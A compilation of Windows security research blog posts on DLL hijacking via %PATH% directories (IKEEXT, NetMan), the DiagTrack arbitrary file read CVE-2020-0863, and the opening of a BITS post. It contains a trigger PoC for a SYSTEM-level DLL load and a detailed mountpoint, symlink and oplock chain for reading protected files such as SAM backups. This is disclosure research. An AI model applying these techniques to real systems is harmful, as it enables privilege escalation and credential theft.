You’ve probably noticed that I used the simple LoadLibrary() function in my example but I didn’t say anything about the second option: LoadLibraryEx(). As a reminder, here is its prototype:

HMODULE LoadLibraryEx(LPCSTR lpLibFileName, HANDLE hFile, DWORD dwFlags);

The first parameter is still the name (or the path) of the DLL but there are two other arguments. According to the documentation, the second one - hFile - is reserved and should be set to NULL. The third argument, however, allows you to specify some flags that will affect the behavior of the function. In our case, the three most interesting flags are:

  • LOAD_LIBRARY_SEARCH_APPLICATION_DIR - If this value is used, the application’s installation directory is searched for the DLL and its dependencies. Directories in the standard search path are not searched.

Indeed, if this flag is used, the search is limited to C:\MyCustomApp.

  • LOAD_LIBRARY_SEARCH_SYSTEM32 - If this value is used, %windows%\system32 is searched for the DLL and its dependencies. Directories in the standard search path are not searched.

Indeed, if this flag is used, the search is limited to C:\Windows\System32.

  • LOAD_LIBRARY_SEARCH_USER_DIRS - If this value is used, directories added using the AddDllDirectory() or the SetDllDirectory() function are searched for the DLL and its dependencies.
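Put together, a hardened load could look like this trivial sketch (mylib.dll and the plugins folder are just placeholder names):

#include <windows.h>

int main(void)
{
    // Restrict the search to the application's directory, System32 and one
    // explicitly trusted directory; %PATH% and the current directory are ignored.
    AddDllDirectory(L"C:\\MyCustomApp\\plugins");   // hypothetical trusted folder
    HMODULE hModule = LoadLibraryExW(L"mylib.dll", NULL,
        LOAD_LIBRARY_SEARCH_APPLICATION_DIR | LOAD_LIBRARY_SEARCH_SYSTEM32 | LOAD_LIBRARY_SEARCH_USER_DIRS);
    if (hModule)
        FreeLibrary(hModule);
    return 0;
}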

Enough with the theory, let’s check a real-life example. :slightly_smiling_face:

You probably know or you’ve probably heard about the IKEEXT DLL hijacking, that was originally published here in 2012 as far as I can tell. Starting with Windows Vista and up to Windows 8, the IKEEXT service loaded the missing wlbsctrl.dll library upon startup without specifying its full path and without using a safe DLL search order. Here is what it looked like back then:

Of course, the researcher who initially reported this to Microsoft was given the same usual answer:

Microsoft has thoroughly investigated the claim and found that this is not a product vulnerability. In the scenario in question, the default security configuration of the system has been weakened by a third-party application. Customers who are concerned with this situation can remove the directory in question from PATH or restrict access to the third-party’s application directory to better protect themselves against these scenarios.

This is the official answer but then, starting with Windows 8.1, this DLL hijacking magically disappeared. Have you ever wondered how and why? Well, let me tell you that IKEEXT still tries to load this missing DLL, even in the latest version of Windows 10. But why don’t we talk about it anymore? First things first, here is what it looks like now on Windows 10:

See? The service tries to load the DLL from C:\Windows\System32, doesn’t find it and then stops. Do you recognize this behavior? :smirk: At this point, and based on what I’ve explained so far, you probably see where I’m going with this.

Let’s take a look at the two versions of the ikeext.dll file…

Of course, there is nothing magical about this. It turns out that Microsoft just silently patched this particular DLL hijacking by modifying the code of ikeext.dll. LoadLibraryEx() is now called instead of LoadLibrary() with the flag LOAD_LIBRARY_SEARCH_SYSTEM32, thus restricting the search to %windir%\System32.

LoadLibraryW(L"wlbsctrl.dll");                                          // Windows 7
LoadLibraryExW(L"wlbsctrl.dll", NULL, LOAD_LIBRARY_SEARCH_SYSTEM32);    // Windows 10

What was the cost of this change? One line of code. Yes, ONLY ONE LINE OF CODE!!! :expressionless:

With that in mind, I want you to think about a particular communication from Microsoft Security Response Center (MSRC). In a blog post, entitled Triaging a DLL planting vulnerability, they explicitly define what is considered a vulnerability and what is not:

Did you read that? Microsoft won’t address DLL hijacking scenarios involving %PATH% directories. I’ll let you draw your own conclusions from this… :roll_eyes:

Conclusion

In the end, DLL hijacking (in the %PATH% directories) is not a vulnerability. That’s what Microsoft keeps replying, over and over again, to people who report such issues. OK, we get that, and now what?

In this post, I discussed two versions of this problem:

  • DLL sideloading - If the permissions of an application’s folder are not properly configured, that’s the responsibility of this application only and, most of the time, the impact is limited to this application. So, there’s nothing special to say about it.
  • DLL hijacking in the %PATH% directories - Again, if the permissions of an application’s folder are not properly configured, that’s the responsibility of this application. However, if it adds itself to the system’s %PATH%, that’s another story. In this case, the entire system is put at risk. Any Windows service that attempts to load a missing DLL without using a secure DLL search order can then be leveraged for privilege escalation. Is this a normal situation? I don’t think so.

When you know that this second scenario can easily be prevented simply by changing one line of code, I find it really hard to accept Microsoft’s answer to this issue. It’s even harder to accept considering that they patch them silently in the end. Unfortunately, I know that there are some people who keep relaying Microsoft’s argument blindly. The problem is that this leads us nowhere. Do we want to improve security or do we just want to spend our time figuring out who’s responsible for what?

In my opinion, an honest and constructive reply to people who report these issues would be something like: “Thank you for your report, we don’t consider this a critical or important security issue but we will address this in a future public release”. Perhaps I’m a bit naive and my point of view is biased because I don’t have the big picture. I don’t know. Anyway, I’ll conclude this post with an approximate translation of a quote from a French humorist: “If you’re absolutely one hundred percent sure about something, there’s a high chance you are wrong.”

Links & Resources

Windows Server 2008R2-2019 NetMan DLL Hijacking

What if I told you that all editions of Windows Server, from 2008R2 to 2019, are prone to a DLL hijacking in the %PATH% directories? What if I also told you that the impacted service runs as NT AUTHORITY\SYSTEM and that the DLL loading can be triggered by a normal user, on demand, and without the need for a machine reboot? Provided that you found some %PATH% directories configured with weak permissions, this would probably be the most straightforward privilege escalation technique I know. I don’t know why there hasn’t been any publication about this yet. Anyway, I’ll try to fill this gap.

Foreword

To start things off, I probably don’t need to clarify this but DLL hijacking is not considered a vulnerability by Microsoft (source). I tend to agree with this statement because, by default, even if a DLL is loaded from the %PATH% directories by a process running with higher privileges, this behavior cannot be exploited by a normal user. In practice though, and especially in corporate environments, it’s quite common to see third-party applications configured with weak folder permissions. In addition, if they add themselves to the system’s %PATH%, the entire system is then put at risk. My personal opinion on the subject is that Microsoft should prevent these uncontrolled DLL loadings as far as possible, so that a minor configuration issue affecting a single application cannot turn into a privilege escalation vector with a much higher impact.

Back to Basics: Searching for DLL Hijacking Using Procmon

This discovery is the unexpected result of some research I was doing on Windows Server 2008 R2. Although this system is no longer supported, it’s still widespread in corporate networks, and I was looking for the easiest way of exploiting binary planting through my CVE-2020-0668 exploit. I’ve done a lot of research on Windows 10 Workstation during the past few months, and working back on Windows 7 / 2008 R2 required me to forget about some techniques I had learned and to restart from the beginning. My original problem was: how to easily exploit arbitrary file writes on Windows 2008 R2?

My first instinct was to start with the IKEEXT service. On a default installation of Windows 2008 R2, this service is stopped, and it tries to load the missing wlbsctrl.dll library whenever it’s started. A normal user can easily trigger this service simply by attempting to initiate a dummy VPN connection. However, starting it only once affects its start mode: it goes from DEMAND_START to AUTOMATIC. Leveraging this service under such circumstances would therefore require a machine reboot, which makes it a far less interesting target. So, I had to look for other ways. I also considered the different DLL hijacking opportunities documented by Frédéric Bourla in his article entitled “A few binary plating 0-days for Windows”, but they are either not easy to trigger or appear quite randomly.

I decided to begin my research process by firing up Process Monitor and checking for DLL loading events failing with a NAME NOT FOUND error. In the context of an arbitrary file write exploit, the research doesn’t have to be limited to the %PATH% folders, so this yields a lot of results! To refine the research, I therefore added a constraint. I wanted to filter out processes which try to load a DLL from the C:\Windows\System32\ folder and then find it in another Windows folder, especially if they need it to function properly. The objective is to avoid a Denial of Service as far as possible.

I considered 3 DLL hijacking cases:

  • A program loads a DLL which doesn’t exist in C:\Windows\System32\ but exists in another Windows directory, C:\Windows\System\ for example. Since the C:\Windows\System32\ folder has a higher priority, this could be a valid candidate.
  • A program loads a non-existing DLL but uses a safe DLL search order. Therefore, it only tries to load it from the C:\Windows\System32\ folder for example.
  • A program loads a non-existing DLL and uses an unrestricted DLL search order.

The first case might lead to a Denial of Service so I left it aside. The second case is interesting but can be a bit difficult to spot amongst all the results returned by Procmon. The third case is definitely the most interesting one. If the DLL doesn’t exist, the risk of causing a Denial of Service when hijacking it is reduced, and it’s also easy to spot in Procmon.

To do so, I didn’t add a new filter in Process Monitor. Instead, I simply added a rule which highlights all the paths containing WindowsPowerShell. Why this particular keyword, you may ask. On all (modern) versions of Windows, C:\Windows\System32\WindowsPowerShell\v1.0\ is part of the default %PATH% folders. Therefore, whenever you see a program trying to load a DLL from this folder, it most probably means that it is prone to DLL Hijacking.

I then tried to start/stop each service or scheduled task I could. And, after having spent a few hours staring at Procmon’s output, I finally saw this:

Wait, what?! Is this really what I think it is? :astonished: Is this a non-existing DLL being loaded by a service running as NT AUTHORITY\SYSTEM? My first thought was: “if wlanhlp.dll is a hijackable DLL, I should already know about it, I must have made a mistake somewhere or I must have installed some third-party app causing this”. But then I remembered. Firstly, I’m using a fresh install of Windows Server 2008 R2 in a dedicated VM. The only third-party application is “VMware Tools”. Secondly, all the research I’ve done so far was mostly on Workstation editions of Windows because it’s often more convenient. Could this be the reason why I saw this event only now?

Fortunately, I have another VM with Windows 7 installed so I quickly checked. It turns out that this DLL exists on a Workstation edition!

If you think about it, it makes sense: assuming wlanhlp.dll is really related to Wlan capabilities, as its name implies, this is expected, since the Wlan API is only available on Workstation editions by default and must be installed as an additional component on Server editions. Anyway, I must be on to something…

NetMan and the Missing Wlan API

Let’s start by looking at the properties of the event in Procmon and learn more about the service.

The process runs as NT AUTHORITY\SYSTEM, that’s some good news for us. It has the PID 972 so let’s check the corresponding service in the Task Manager.

Three services run inside this process. Looking at the Stack Trace of the event in Procmon, we should be able to determine the name of the one which tried to load this DLL.

We can see an occurrence of netman.dll so the corresponding service must be NetMan (a.k.a. Network Connections). That’s one problem solved. If we take a closer look at this Stack Trace, we also notice several lines containing references to RPCRT4.dll or ole32.dll. That’s a good sign. It means that this event was most probably triggered through RPC/COM. If so, there is a chance we can also trigger this event as a normal user with a few lines of code but I’m getting ahead of myself.

This DLL hijacking opportunity is due to the fact that the Wlan API is not installed by default on a server edition of Windows 6.1 (7 / 2008 R2). The question is: does the same principle apply to other versions of Windows? :thinking:

Luckily, I use quite a lot of virtual machines for my research and I had instances of Windows Server 2012 R2 and 2019 already set up so it didn’t take long to verify.

On Windows Server 2012 R2, wlanhlp.dll doesn’t show up in Procmon. However wlanapi.dll does instead. Looking at the details of the event, it turns out that it is identical. This means that Windows 6.3 (8.1 / 2012 R2) is also “affected”.

Ok, this version of Windows is pretty old now, Windows 2019 cannot be affected by the same issue, right? Let’s check this out…

The exact same behavior occurs on Windows Server 2019 as well! :smirk: I ended up checking this on all possible versions of Windows Server from 2008 to 2019. I won’t bore you with the details: all the versions are prone to this DLL hijacking. The only one I couldn’t test thoroughly was Server 2008; I wasn’t able to reproduce the issue on this one.

How to Trigger this DLL Hijacking Event on Demand?

Let’s summarize the situation. On all versions of Windows Server, the NetMan service, which runs as NT AUTHORITY\SYSTEM, tries to load the missing wlanhlp.dll or wlanapi.dll library without using a safe DLL search order. Therefore, it ends up trying to load this DLL from the directories which are listed in the system’s %PATH% environment variable. That’s a great start I’d say! :slightly_smiling_face:

The next step is to figure out whether we can trigger this event as a normal user. I already mentioned that this behavior was due to some RPC/COM events, but it doesn’t necessarily mean that we can trigger it ourselves. This event could also be the result of two services communicating with each other through RPC.

Anyway, let’s hope for the best and start by checking the Stack Trace once again but, this time, using an instance of Procmon configured to use the public symbols provided by Microsoft. To do so, I switched to the Windows 10 VM I use for security research.

We can see that the CLanConnection::GetProperties() method is called here. In other events, the CLanConnection::GetPropertiesEx() method is called instead. Let’s see if we can find these methods by inspecting the COM objects exposed by NetMan using OleViewDotNet.

Simply based on the name of the class, the LAN Connection Class seems like a good candidate. So, I created an instance of this class and checked the details of the INetConnection interface.

Here it is! We can see the CLanConnection::GetProperties() method. We’re getting close! :ok_hand:

At this point, I was thinking that all of this looked too good to be true. First, I saw this DLL hijacking which I had never seen before. Then, I saw that it was triggered by an RPC/COM event. Finally, finding it with OleViewDotNet was trivial. There had to be a catch! Though, only one problem could arise now: restrictive permissions on the COM object.

COM objects are securable too and they have ACLs which define who is allowed to use them. So, we need to check this before going any further.

When I first saw Administrators and NT AUTHORITY\..., I thought for a second, “crap, this can only be triggered by high-privileged accounts”. And then I saw NT AUTHORITY\INTERACTIVE, phew… :sweat_smile:

What this actually means is that this COM object can be used by normal users only if they are authenticated using an interactive session. More specifically, you’d need to logon locally on the server. Not very useful, right?! Well, it turns out that when you connect through RDP (this includes VDI), you get an interactive session as well so, under these circumstances, this COM object could be used by a normal user. Otherwise, if you tried to use it in a WinRM session for example, you’d get an “Access denied” error. That’s not as good as I expected initially but that’s still a seemingly interesting trigger.

The below screenshot shows a command prompt opened in an RDP session on Windows Server 2019.

At this point, the research part is over so let’s write some code! Fortunately, the INetConnection interface is documented (here), which makes things a lot easier. Then, while searching for a way to enumerate the network interfaces with INetConnectionManager::EnumConnections(), I stumbled upon an interesting solution posted by Simon Mourier on StackOverflow here. Yes, I copied some code from StackOverflow, that’s a bit lame, I know… :neutral_face:

Here is my final Proof-of-Concept code:

// https://stackoverflow.com/questions/5917304/how-do-i-detect-a-disabled-network-interface-connection-from-a-windows-applicati/5942359#5942359

#include <iostream>
#include <comdef.h>
#include <netcon.h>

int main()
{
    HRESULT hResult;

    typedef void(__stdcall* LPNcFreeNetconProperties)(NETCON_PROPERTIES* pProps);
    HMODULE hModule = LoadLibrary(L"netshell.dll");
    if (hModule == NULL) { return 1; }
    LPNcFreeNetconProperties NcFreeNetconProperties = (LPNcFreeNetconProperties)GetProcAddress(hModule, "NcFreeNetconProperties");

    hResult = CoInitializeEx(0, COINIT_MULTITHREADED);
    if (SUCCEEDED(hResult))
    {
        INetConnectionManager* pConnectionManager = 0;
        hResult = CoCreateInstance(CLSID_ConnectionManager, 0, CLSCTX_ALL, __uuidof(INetConnectionManager), (void**)&pConnectionManager);
        if (SUCCEEDED(hResult))
        {
            IEnumNetConnection* pEnumConnection = 0;
            hResult = pConnectionManager->EnumConnections(NCME_DEFAULT, &pEnumConnection);
            if (SUCCEEDED(hResult))
            {
                INetConnection* pConnection = 0;
                ULONG count;
                while (pEnumConnection->Next(1, &pConnection, &count) == S_OK)
                {
                    NETCON_PROPERTIES* pConnectionProperties = 0;
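                    // This call is processed by the NetMan service (CLanConnection::GetProperties).
                    // Server-side, it is what triggers the attempt to load the missing wlanhlp.dll / wlanapi.dll.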
                    hResult = pConnection->GetProperties(&pConnectionProperties);
                    if (SUCCEEDED(hResult))
                    {
                        wprintf(L"Interface: %ls\n", pConnectionProperties->pszwName);
                        NcFreeNetconProperties(pConnectionProperties);
                    }
                    else
                        wprintf(L"[-] INetConnection::GetProperties() failed. Error code = 0x%08X (%ls)\n", hResult, _com_error(hResult).ErrorMessage());
                    pConnection->Release();
                }
                pEnumConnection->Release();
            }
            else
                wprintf(L"[-] IEnumNetConnection::EnumConnections() failed. Error code = 0x%08X (%ls)\n", hResult, _com_error(hResult).ErrorMessage());
            pConnectionManager->Release();
        }
        else
            wprintf(L"[-] CoCreateInstance() failed. Error code = 0x%08X (%ls)\n", hResult, _com_error(hResult).ErrorMessage());
        CoUninitialize();
    }
    else
        wprintf(L"[-] CoInitializeEx() failed. Error code = 0x%08X (%ls)\n", hResult, _com_error(hResult).ErrorMessage());
    
    FreeLibrary(hModule);
    wprintf(L"Done\n");
}

The below screenshot shows the final result on Windows Server 2008 R2. As we can see, we can trigger the DLL loading simply by enumerating the Ethernet interfaces of the machine. Needless to say, the machine must have at least one Ethernet interface, otherwise this technique doesn’t work. :smile:

The screenshot below shows an attempt to run the same executable as a normal user connected through a remote PowerShell session on Windows Server 2019.

(2020-04-13 update) Dealing with the INTERACTIVE restriction

A couple of days after the publication of this blog post, @splinter_code brought to my attention that it was technically possible to spawn an interactive process from a non-interactive one.

Then, I had the chance to exchange a few words with him. It turns out that he developed a tool called RunasCs which implements, among other things, a generic way of spawning an interactive process. He also took the time to explain to me how it works. This trick involves some Windows internals subtleties which are not commonly well known. I won’t detail the technique here because it would require a dedicated blog post in order to explain everything clearly, but I’ll try to give a high-level explanation. I hope we will see a blog post from the author himself soon! :slightly_smiling_face:

To put it simply, you can call CreateProcessWithLogon() in order to create an interactive process. This function requires the name and the password of the target user. The problem is that if you try to do that from a process running in session 0 (where most of the services live), the child process will immediately die. A typical example is when you connect remotely through WinRM: all your commands are executed by a subprocess running in session 0 with your identity.

Why is that a problem, you may ask? The thing is, an interactive process is called this way because it interacts with a desktop, which is a particular securable object in the Windows world. However, in the case of our WinRM process running in session 0, you wouldn’t (and you shouldn’t) be allowed to interact with this desktop. What @splinter_code found is that you can edit the ACL of the desktop object in the context of the current process in order to grant the current user access to this object. Child processes will then inherit these permissions and therefore have a desktop to interact with. Really clever!
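
For reference, here is a minimal sketch of the CreateProcessWithLogon() call itself, with placeholder credentials; the desktop and window station DACL adjustments described above are deliberately left out, so running this as-is from a session 0 process would still fail:

#include <windows.h>
#include <stdio.h>

int wmain()
{
    STARTUPINFOW si = { 0 };
    PROCESS_INFORMATION pi = { 0 };
    si.cb = sizeof(si);

    // Placeholder credentials of the target user ("." means the local machine).
    wchar_t command[] = L"C:\\Windows\\System32\\cmd.exe";

    if (!CreateProcessWithLogonW(L"lab-user", L".", L"S3cur3P4ssw0rd!",
            LOGON_WITH_PROFILE,         // load the user's profile
            NULL, command,
            CREATE_NEW_CONSOLE,
            NULL, NULL, &si, &pi))
    {
        wprintf(L"CreateProcessWithLogonW() failed (error %u)\n", GetLastError());
        return 1;
    }

    wprintf(L"Spawned interactive process with PID %u\n", pi.dwProcessId);
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    return 0;
}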

As you can see on the below screenshot, using this trick, we can spawn an interactive process and therefore run NetManTrigger.exe as if we were logged in locally. :slightly_smiling_face:

Conclusion

Following this analysis, I can say that the NetMan service is probably the most useful target for DLL hijacking I know about. It comes with a small caveat though. As a normal user, you need an interactive session (RDP / VDI), which makes it quite useless if you’re logged on through a remote PowerShell session for instance. But there is another interesting case: if you’ve compromised another service running as LOCAL SERVICE or NETWORK SERVICE, then you would still be able to trigger the NetMan service to elevate your privileges to SYSTEM.

With this discovery, I also learned a lesson. Focusing your attention and your research on a particular environment may sometimes prevent you from finding interesting stuff, which turns out to be particularly relevant in the context of a pentest.

Last but not least, I integrated this in my Windows Privilege Escalation Check script - PrivescCheck. Depending on the version of Windows, the Invoke-HijackableDllsCheck function will tell you which DLL may potentially be hijacked through the %PATH% directories. Thanks @1mm0rt41 for suggesting the idea! :thumbsup:

Links & Resources

CVE-2020-0863 - An Arbitrary File Read Vulnerability in Windows Diagnostic Tracking Service

Although this vulnerability doesn’t directly result in a full elevation of privileges with code execution as NT AUTHORITY\SYSTEM, it is still quite interesting because of the exploitation “tricks” involved. Diagnostic Tracking Service (a.k.a. Connected User Experiences and Telemetry Service) is probably one of the most controversial Windows features, known for collecting user and system data. Therefore, the fact that I found an Information Disclosure vulnerability in this service is somewhat ironic. The bug allowed a local user to read arbitrary files in the context of NT AUTHORITY\SYSTEM.

DiagTrack RPC Interfaces

This time, I won’t talk about COM but pure old school RPC so, let’s check the interfaces exposed by Diagtrack thanks to RpcView.

We can see that it has quite a few interfaces but we will focus on the one with the ID 4c9dbf19-d39e-4bb9-90ee-8f7179b20283. This one has 37 methods. This makes for quite a large attack surface! :wink:

The vulnerability I found lay in the UtcApi_DownloadLatestSettings procedure… :smirk:

The “UtcApi_DownloadLatestSettings” procedure

RpcView can generate the Interface Definition Language (IDL) file corresponding to the RPC interface. Once compiled, we get the following C function prototype for the UtcApi_DownloadLatestSettings procedure.

long DownloadLatestSettings( 
    /* [in] */ handle_t IDL_handle,
    /* [in] */ long arg_1,
    /* [in] */ long arg_2
)

Unsurprisingly, the first parameter is the RPC binding handle. The two other parameters are yet unknown.

Note: if you’re not familiar with the way RPC interfaces work, here is a very short explanation. While working with Remote Procedure Calls, the first thing you want to do is get a handle on the remote interface using its unique identifier (e.g. 4c9dbf19-d39e-4bb9-90ee-8f7179b20283 here). Only then can you use this handle to invoke procedures. That’s why you’ll often find a handle_t parameter as the first argument of a procedure. Not all interfaces work like this but most of them do.
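
As an illustration only, here is the typical pattern for obtaining a binding handle on a local (ALPC) RPC interface; the endpoint name used below is a made-up placeholder, the actual endpoint registered by the DiagTrack process can be retrieved with RpcView:

#include <windows.h>
#include <rpc.h>
#include <stdio.h>

#pragma comment(lib, "rpcrt4.lib")

RPC_STATUS CreateBindingHandle(RPC_BINDING_HANDLE* phBinding)
{
    RPC_WSTR pszStringBinding = NULL;
    RPC_STATUS status;

    // Compose a string binding for the "ncalrpc" protocol sequence (local RPC).
    // "FakeEndpointName" is a placeholder, not the actual DiagTrack endpoint.
    status = RpcStringBindingComposeW(NULL, (RPC_WSTR)L"ncalrpc", NULL,
        (RPC_WSTR)L"FakeEndpointName", NULL, &pszStringBinding);
    if (status != RPC_S_OK)
        return status;

    // Turn the string binding into an actual binding handle.
    status = RpcBindingFromStringBindingW(pszStringBinding, phBinding);
    RpcStringFreeW(&pszStringBinding);

    return status;
}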

After getting a binding handle on the remote interface, I first tried to invoke this function with the following parameters.

RPC_BINDING_HANDLE g_hBinding;
/* ... initialization of the binding handle skipped ... */
HRESULT hRes;
hRes = DownloadLatestSettings(g_hBinding, 1, 1);

And, as usual, I analyzed the file operations running in the background with Process Monitor.

Although the service is running as NT AUTHORITY\SYSTEM, I noticed that it was trying to enumerate XML files located in the following folder, which is owned by the currently logged-on user.

C:\Users\lab-user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Tips\

The user lab-user is the one I use for my tests. It’s a normal user with standard privileges and no admin rights. This operation originated from a call to FindFirstFileW() in diagtrack.dll.
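
In other words, the service does something roughly equivalent to the following loop; this is only an illustration of the behavior observed in Procmon, not the actual code of diagtrack.dll:

#include <windows.h>
#include <stdio.h>

int wmain()
{
    WIN32_FIND_DATAW ffd;

    // Enumerate the XML files located in the user-owned "Tips" folder.
    HANDLE hFind = FindFirstFileW(
        L"C:\\Users\\lab-user\\AppData\\Local\\Packages\\"
        L"Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\*.xml",
        &ffd);

    if (hFind == INVALID_HANDLE_VALUE)
    {
        wprintf(L"No XML file found (error %u)\n", GetLastError());
        return 1;
    }

    do
    {
        // The service then reads each file and copies its content to a new file
        // with the same name in C:\ProgramData\Microsoft\Diagnosis\SoftLandingStage\.
        wprintf(L"Found: %ls\n", ffd.cFileName);
    } while (FindNextFileW(hFind, &ffd));

    FindClose(hFind);
    return 0;
}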

The folder seems to be empty by default so I created a few XML files there.

I ran my test program again and observed the result.

This time, the QueryDirectory operation succeeds and the service reads the content of file1.xml, which is the first XML file present in the directory and copies it into a new file in the C:\ProgramData\Microsoft\Diagnosis\SoftLandingStage\ folder (with the same name).

The same process applies to the two other files: file2.xml, file3.xml.

Finally, all the XML files which were created in C:\ProgramData\[…]\SoftLandingStage are deleted at the end of the process.

Note: I created a specific rule in Procmon to highlight CreateFile operations occurring in the context of a DeleteFile API call.

The CreateFile operations originated from a call to DeleteFileW() in diagtrack.dll.

The Arbitrary File Read Vulnerability

The files are not moved with a call to MoveFileW() or copied with a call to CopyFileW() and we cannot control the destination folder so, a local attacker wouldn’t be able to leverage this operation to move/copy an arbitrary file to an arbitrary location. Instead, each file is read and then the content is written to a new file in C:\ProgramData\[...]\SoftLandingStage\. In a way, it’s a manual file copy operation.

The one thing we can fully control though is the source folder because it’s owned by the currently logged-on user. The second thing to consider is that the destination folder is readable by Everyone. It means that, by default, new files created in this folder are also readable by Everyone so this privileged file operation may still be abused.

For example, we could replace the C:\Users\lab-user\AppData\Local\Packages\[…]\Tips folder with a mountpoint to an Object Directory and create pseudo symbolic links to point to any file we want on the file system.

If a backup of the SAM file exists, we could create a symlink such as follows in order to get a copy of the file.

C:\Users\lab-user\AppData\Local\Packages\[…]\Tips -> \RPC Control
\RPC Control\file1.xml -> \??\C:\Windows\Repair\SAM

Theoretically, if the service tries to open file1.xml, it would be redirected to C:\Windows\Repair\SAM. So, it would read its content and copy it to C:\ProgramData\[…]\SoftLandingStage\file1.xml, making it readable by any local user. Easy, right?! :sunglasses:

Well… Wait a minute. We have two problems here. :confused:

  1. The FindFirstFileW() call on the Tips folder would fail because the target of the mountpoint isn’t a “real” folder.
  2. The new file1.xml file which is created in C:\ProgramData\[…]\SoftLandingStage is deleted at the end of the process.

It turns out that we can work around these two issues using an extra mountpoint, several bait files and a combination of opportunistic locks (see the details in the next parts).

Solving The “FindFirstFileW()” Problem

In order to exploit the behavior described in the previous part, we must find a way to reliably redirect the file read operation to any file we want. But, we cannot use a pseudo symbolic link straight away because of the call to FindFirstFileW().

Note: the Win32 FindFirstFileW() function starts by listing the files which match a given filter in a target directory, but this doesn’t make any sense for an Object Directory. To put it simply, you can dir C:\Windows but you cannot dir "\RPC Control".

This first problem is quite simple to address though. Instead of creating a mountpoint to an Object Directory immediately, we can first create a mountpoint to an actual directory, containing some bait files.

First, we would have to create a temporary workspace directory such as follows:

C:\workspace
|__ file1.xml 
|__ file2.xml

Then, we can create the mountpoint:

C:\Users\lab-user\AppData\Local\Packages\[…]\Tips -> C:\workspace

Doing so, FindFirstFileW() would succeed and return file1.xml. In addition, if we set an OpLock on this file we can partially control the execution flow of the service because the remote procedure would be paused whenever it tries to access it.
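
If you are not familiar with opportunistic locks, here is a minimal sketch of how one can be requested from user land with FSCTL_REQUEST_OPLOCK; it assumes the target file already exists (here, the first bait file), and the event is signaled as soon as another process attempts to open the file:

#include <windows.h>
#include <winioctl.h>
#include <stdio.h>

int wmain()
{
    // In the exploit, this would be the first bait file of the workspace directory.
    HANDLE hFile = CreateFileW(L"C:\\workspace\\file1.xml", GENERIC_READ,
        FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
        NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL);
    if (hFile == INVALID_HANDLE_VALUE)
    {
        wprintf(L"CreateFileW() failed (error %u)\n", GetLastError());
        return 1;
    }

    REQUEST_OPLOCK_INPUT_BUFFER in = { 0 };
    in.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION;
    in.StructureLength = sizeof(in);
    in.RequestedOplockLevel = OPLOCK_LEVEL_CACHE_READ | OPLOCK_LEVEL_CACHE_HANDLE;
    in.Flags = REQUEST_OPLOCK_INPUT_FLAG_REQUEST;

    REQUEST_OPLOCK_OUTPUT_BUFFER out = { 0 };
    out.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION;
    out.StructureLength = sizeof(out);

    OVERLAPPED ov = { 0 };
    ov.hEvent = CreateEventW(NULL, TRUE, FALSE, NULL);

    // The request stays pending (ERROR_IO_PENDING) until the oplock is broken.
    if (!DeviceIoControl(hFile, FSCTL_REQUEST_OPLOCK, &in, sizeof(in), &out, sizeof(out), NULL, &ov)
        && GetLastError() != ERROR_IO_PENDING)
    {
        wprintf(L"Oplock request failed (error %u)\n", GetLastError());
        return 1;
    }

    wprintf(L"Oplock set, waiting...\n");
    WaitForSingleObject(ov.hEvent, INFINITE);
    wprintf(L"Oplock triggered! The remote procedure is now paused.\n");

    // This is where the exploit would switch the mountpoint and create the symbolic
    // links, before letting the service continue (e.g. by closing the handle).
    CloseHandle(hFile);
    return 0;
}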

When the OpLock is triggered, we can switch the mountpoint to an Object Directory. This is possible because the QueryDirectory operation already occurred and is done only once at the beginning of the FindFirstFileW() call.

C:\Users\lab-user\AppData\Local\Packages\[…]\Tips -> \RPC Control
\RPC Control\file2.xml -> \??\C:\users\lab-admin\desktop\secret.txt

Note: at this point, we don’t have to create a symbolic link for file1.xml because the service already has a handle on this file.

Thus, when the service opens C:\Users\lab-user\AppData\[…]\Tips\file2.xml, it actually opens secret.txt and copies its content to C:\ProgramData\[…]\SoftLandingStage\file2.xml.

Conclusion: we can trick the service into reading a file we don’t own. But this leads us to the second problem: at the end of the process, C:\ProgramData\[…]\SoftLandingStage\file2.xml is deleted, so we wouldn’t be able to read it anyway.

Solving The Final File Delete Problem

Since the target file is deleted at the end of the process, we must win a race against the service and get a copy of the file before this happens. To do so, we have two options. The first one would be brute force. We could implement the strategy described in the previous part and then monitor the target directory C:\ProgramData\[…]\SoftLandingStage in a loop, in order to get a copy of the file as soon as NT AUTHORITY\SYSTEM has finished writing the new XML file.

But brute force is always the option of last resort. Here, we have a second option which is way more reliable, but we have to rethink the strategy from the beginning.

Instead of creating two files in our initial temporary workspace directory, we will create three files.

C:\workspace
|__ file1.xml
|__ file2.xml  
|__ file3.xml

The next steps will be the same but, when the OpLock on file1.xml is triggered, we will perform two extra actions.

We will first switch the mountpoint and create two pseudo symbolic links. We must make sure that the file3.xml link points to the actual file3.xml file.

C:\Users\lab-user\AppData\Local\Packages\[…]\Tips -> \RPC Control
\RPC Control\file2.xml -> \??\C:\users\lab-admin\desktop\secret.txt
\RPC Control\file3.xml -> \??\C:\workspace\file3.xml

And, we set a new OpLock on file3.xml before releasing the first one.

Thanks to this trick, we are able to influence the service as follows:

  1. DiagTrack tries to read file1.xml and hits the first OpLock.
  2. At this point, we switch the mountpoint, create the two symlinks and set an OpLock on file3.xml.
  3. We release the first OpLock (file1.xml).
  4. DiagTrack copies file1.xml and file2.xml which points to secret.txt.
  5. DiagTrack tries to read file3.xml and hits the second OpLock.
  6. This is the crucial part. At this point, the remote procedure is paused so we can get a copy of C:\ProgramData\[…]\SoftLandingStage\file2.xml, which is itself a copy of secret.txt.
  7. We release the second OpLock (file3.xml).
  8. The remote procedure terminates and the three XML files are deleted.

Note: this trick works because the process performed by DiagTrack is done sequentially. Each file is copied one after the other and all newly created files are deleted at the very end.

This results in a reliable exploit which allows a normal user to get a copy of any file readable by NT AUTHORITY\SYSTEM. Here is a screenshot showing the PoC I developed.

Links & Resources

CVE-2020-0787 - Windows BITS - An EoP Bug Hidden in an Undocumented RPC Function

This post is about an arbitrary file move vulnerability I found in the Background Intelligent Transfer Service. This is yet another example of a privileged file operation abuse in Windows 10. There is nothing really new but the bug itself is quite interesting because it was hidden in an undocumented function. Therefore, I will explain how I found it and I will also share some insights about the reverse engineering process I went through in order to identify the logic flaw. I hope you’ll enjoy reading it as much as I enjoyed writing it.

